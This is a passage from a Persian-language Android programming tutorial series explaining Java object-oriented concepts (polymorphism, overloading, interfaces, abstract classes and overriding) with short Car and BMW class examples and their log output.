  مفهوم چند ریختی یا Polymorphism می توان کلاس‌های extends شده از هم را با هم تلفیق کرد، مثلا دو کلاس زیر را ببینید:. public class Pride extends Car{ } public class Pride131 extends Pride{ } حال انجام عملی مانند زیر مجاز است: Pride131 pride131 = new Pride131(); Car car = pride131; مفهوم شی گرایی در شروع کار کمی گنگ است ولی در ادامه برنامه نویسی و استفاده از آن برایتان شیرین و آسان خواهد شد. قسمت‌های بعدی را از دست ندهید.
 25. Programming-Android

  مفهوم Overloading در شی گرایی و جاوا نام متدهای یک کلاس همه باید منحصر به فرد باشند مگر این که ورودی آن‌ها متفاوت باشد. اگر کلاسی چند متد با یک نام ولی پارامترهای ورودی متفاوت داشت مفهوم Overloading را در باره این کلاس پیاده سازی کرده ایم. به عنوان مثال در کلاس Car داریم: package anonymous; import android.util.Log; public class Car { public Car(String name){ Log.i("oop_message: ", "constructor number 1"); } public Car(String name, int id){ Log.i("oop_message: ", "constructor number 2"); } } در مثال فوق کلاس Car دو متد سازنده دارد، متد سازنده اول که در سطر پنج قرار گرفته است یک ورودی و متد دوم که در سطر هشت قرار دارد دو ورودی دارد. در کلاس MainActivity شی automobile را از روی کلاس Car ایجاد می‌کنیم: Car automobile = new Car("BMW"); به نظر شما کدام Log نمایش داده می‌شود، Log متعلق به متد اول یا دوم؟ بدلیل هماهنگی نوع و تعداد ورودی شی فوق با متد اول قطعا Log متد اول اجرا می‌شود. نکته‌ای که در این جا باید به آن اشاره کنیم این است که در overloading کلاس‌های extends شده باید مراقب بود و ورودی و خروجی‌ها را همیشه با دقت انتخاب کرد. مثلا فرض کنید کلاس BMW را از کلاس Car فوق extends کردیم: package anonysec.anonymous; public class BMW extends Car { public BMW(String name) { super(name); } public BMW(String name, int id){ super(name, id); } public BMW(){ super("X3", 5); } public BMW(String name, int id, String max_speed){ super(name); } } در کلاس فوق چهار متد سازنده ایجاد کردیم که به شرح زیر هستند: متد سازنده سطر 4: این متد سازنده منطبق با متد سازنده اول کلاس Car است و یک ورودی به نام name دارد. متد سازنده سطر 7: این متد سازنده منطبق با متد سازنده دوم کلاس Car است که دو ورودی دارد و با super دو ورودی را به کلاس Car ارجاع می‌دهیم. متد سازنده سطر 10: این متد سازنده ورودی ندارد ولی با استفاده از super دو متغیر را به کلاس Car ارجاع دادیم، بنابراین این متد نیز منطبق با متد سازنده دوم کلاس Car است. ایجاد کردن یک شی از کلاس BMW منطبق با این متد نیز بدون ورودی است: BMW bmw = new BMW(); متد سازنده سطر 13: این متد سازنده سه ورودی دارد ولی در super ما تنها پارامتر name را به کلاس Car ارجاع می‌دهیم پس این متد مطابق متد اول کلاس Car است. نکته: overloading تنها برای متدهای سازنده نیست و این عملیات را می‌توان در مورد هر متدی اجرا کرد.
 26. Programming-Android

  مفهوم interface چیست interface در واقع کلاسی از نوع abstract است که هیچ تابع غیر abstract‌ای ندارد و در تعریف آن از کلمه کلیدی class استفاده نمی‌شود. مانند package anonysec.anonymous; public interface InterfaceCar { abstract void speed(); } interface را نمی‌توان extends کرد چون ساختاری متفاوت دارد و برای این منظور از implements استفاده می‌شود. مانند زیر: package anonysec.anonymous; public class InterfaceBMW implements InterfaceCar{ } وقتی یک interface را implements کردید یک خط قرمز زیر نام کلاس جدید کشیده می‌شود که با Alt + Enter می‌توانید کلیه متدها را وارد محیط Android Studio کنید.
 27. Programming-Android

  مفهوم Abstract چیست همانطور که در قسمت قبل گفتیم وقتی از abstract استفاده می‌کنیم که بدانیم چه کارهایی را باید انجام بدهیم ولی مراحل عمل را حین ایجاد کردن شی جدید تعریف کنیم. مثال زیر را ببینید: package anonysec.anonymous; public abstract class AbstractCar { public abstract void brake(); public abstract void stop(); public int max_speed(){ return 180; } } در کلاس MainActivity به محض تایپ کردن AbstractCar car = new و زدن کلیدهای ترکیبی Alt + Enter اولین گزینه همه کارها را به صورت خودکار برای شما انجام می‌دهد، و نتیجه را مانند زیر می‌بینید AbstractCar car = new AbstractCar() { @Override public void brake() { } @Override public void stop() { } }; حال به سادگی می‌توانید عملیات موجود در متدهای brake و stop را پیاده سازی کنید، و همانطور که می‌بینید عبارت @Override به منظور Override شدن متد‌ها ذکر شده است. نکته: طبیعتا وقتی یک کلاس از کلاس Car را extends می‌کنید نیز باید این متدها را پیاده سازی کنید.
 28. Programming-Android

  مفهوم Overriding تغییر متد والد بر اساس نیاز کلاس جدید ارث برده شده را Overriding می‌گویند. در واقع لفظ Override در شی گرایی به معنای باز نویسی است. کلاس Car زیر را ببینید: package anonysec.anonymous; import android.util.Log; public class Car { public Car(){ Log.i("oop_message", "constructor from Car class"); } public void brake(){ Log.i("oop_message", "Run method brake from Car class"); } } کلاس BMW را در زیر ببینید: package anonysec.anonymous; import android.util.Log; public class BMW extends Car { public BMW(){ Log.i("oop_message", "constructor from BMW class"); brake(); } @Override public void brake(){ super.brake(); Log.i("oop_message", "Run method brake from BMW class"); } } در سطر 8 اعلام می‌کنیم که متد سازنده در اولین اجرای خود متد brake موجود در کلاس BMW را اجرا خواهد کرد. در سطر 12 یک متد به نام brake داریم که هم نام متد brake کلاس Car می‌باشد. عبارت @Override که در سطر 11 آمده یک عبارت توضیحی است که نشان می‌دهد قصد Override کردن و یا بازنویسی متد را داریم. در سطر 13 با دستور super.brake(); اعلام می‌کنیم که قبل از هر کاری باید متد brake از کلاس super اجرا گردد. به کلاس MainActivity نیز یک شی از کلاس BMW به صورت زیر ایجاد کنید: BMW bmw = new BMW(); لاگ‌هایی که در خروجی نمایش داده می‌شوند به ترتیب زیر هستند: oop_message: constructor from Car class oop_message: constructor from BMW class oop_message: Run method brake from Car class oop_message: Run method brake from BMW class سطر اول: به محض ایجاد کلاس BMW از کلاس Car سازنده کلاس Car فراخوانی می‌شود. سطر دوم: متد سازنده BMW در مرحله دوم اجرا شده و Log آن اجرا می‌شود. سطر سوم: بدلیل فراخوانی متد brake درون سازنده کلاس BMW و وجود عبارت super.brake(); در این سازنده لاگ مخصوص به متد brake کلاس Car اجرا می‌شود. سطر چهارم: پس از اجرا شدن متد super.brake(); لاگ موجود در متد brake کلاس BMW اجرا می‌شود. نکته: اگر در متد brake کلاس BMW دستور super.brake(); را بعد از Log قرار دهیم جای سطر‌های سه و چهار عوض خواهد شد. قوانین Overriding عبارتند از: ورودی ها و خروجی متد Overide شده و متد اصلی باید یکسان باشند. متدسازنده و متد final شده قابل Override شدن نیستند. متدهای Static قابل Override شدن نیستند ولی می‌توان آن‌ها را دوباره تعریف کرد.
 1. نمایش فعالیت های بیشتر
×